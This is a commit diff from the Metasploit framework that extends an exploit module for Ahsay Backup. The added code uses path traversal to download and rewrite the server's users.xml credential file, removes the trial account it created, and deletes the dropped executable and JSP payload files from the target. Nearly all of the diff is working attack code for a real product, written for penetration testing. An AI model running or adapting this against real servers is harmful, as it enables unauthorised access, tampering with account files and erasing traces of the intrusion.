#12095 Added cleaning up of trial account and dropper files.

rapid7 · Jul 21, 2019 · 71da3b7 · 71da3b7
1 parent e26b650
commit 71da3b7
Showing 1 changed file with 81 additions and 4 deletions.
diff --git a/modules/exploits/windows/misc/ahsay_backup_fileupload.rb b/modules/exploits/windows/misc/ahsay_backup_fileupload.rb
@@ -5,10 +5,10 @@
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
-
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
@@ -72,7 +72,7 @@ def initialize(info = {})
         Opt::RPORT(443),
         OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
         OptString.new('USERNAME', [true, 'Username for the (new) account', Rex::Text.rand_text_alphanumeric(8)]),
-        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alphanumeric(12) + Rex::Text.rand_char("","!$%^&*")]),
+        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alpha(8) + Rex::Text.rand_text_numeric(5) + Rex::Text.rand_char("","!$%^&*")]),
         OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
         OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),
 
@@ -213,6 +213,32 @@ def create_account?
     end
   end
 
+
+  def remove_account
+    if datastore['CREATEACCOUNT']
+      print_status("Looking for account")
+      xml_doc = download("../../conf/users.xml")
+      username = datastore['USERNAME']
+      xmldoc = Document.new(xml_doc)
+      el = 0
+      xmldoc.elements.each("Setting/Key") do |e|
+          el = el + 1
+          e.elements.each("Value") do |a|
+              if a.attributes["name"].include?('name')
+                  if a.attributes["data"].include?(username)
+                      print_status("Found account")
+                      xmldoc.root.elements.delete el
+                      print_status("Removed account")
+
+                  end
+              end
+          end
+      end
+      new_xml = xmldoc.root
+      upload("../../conf/users.xml", new_xml.to_s)
+    end
+  end
+
   def prepare_path(path)
     if path.end_with? '/'
       path = path.chomp('/')
@@ -246,6 +272,12 @@ def drop_and_execute()
     if res and res.code == 200
       print_good("Exploit executed!")
     end
+
+    #Cleaning up
+    remove_account
+    delete(exefileLocation)
+    delete(jspfileLocation)
+    delete("../../user/#{datastore['USERNAME']}",true)
   end
 
   def upload(fileLocation, content)
@@ -262,14 +294,59 @@ def upload(fileLocation, content)
       'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
       'method' => 'PUT',
       'headers' => headers,
-      'data' => content
+      'data' => content,
+      'timeout' => 20
     })
-    register_file_for_cleanup(fileLocation)
     if res && res.code == 201
       print_good("Succesfully uploaded #{fileLocation}")
     else
       fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
     end
   end
 
+  def download(fileLocation)
+    #TODO make vars_get variable
+    print_status("Downloading file")
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers = {}
+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    res = send_request_cgi({
+      #/obs/obm7/file/download?X-RSW-custom-encode-path=../../conf/users.xml
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','download'),
+      'method' => 'GET',
+      'headers' => headers,
+      'vars_get' => {
+        'X-RSW-custom-encode-path' => fileLocation
+      }
+    })
+
+    if res and res.code == 200
+      res.body
+    end
+  end
+
+  def delete(fileLocation, recursive=false)
+    print_status("Deleting file #{fileLocation}")
+    username = Rex::Text.encode_base64(datastore['USERNAME'])
+    password = Rex::Text.encode_base64(datastore['PASSWORD'])
+    headers = {}
+    headers['X-RSW-Request-0'] = username
+    headers['X-RSW-Request-1'] = password
+    res = send_request_cgi({
+      #/obs/obm7/file/delete?X-RSW-custom-encode-path=../../user/xyz
+      'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','delete'),
+      'method' => 'DELETE',
+      'headers' => headers,
+      'vars_get' => {
+        'X-RSW-custom-encode-path' => fileLocation,
+        'recursive' => recursive
+      }
+    })
+
+    if res and res.code == 200
+      res.body
+    end
+  end
 end